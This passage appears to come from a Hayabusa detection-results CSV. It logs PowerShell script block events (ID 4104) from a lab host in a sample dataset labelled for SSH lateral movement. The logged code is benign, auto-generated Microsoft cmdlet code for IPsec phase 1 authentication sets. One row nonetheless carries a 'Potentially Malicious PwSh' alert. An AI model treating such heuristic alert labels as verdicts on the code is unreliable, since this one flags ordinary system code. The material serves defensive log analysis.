$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 
+00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = 
${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 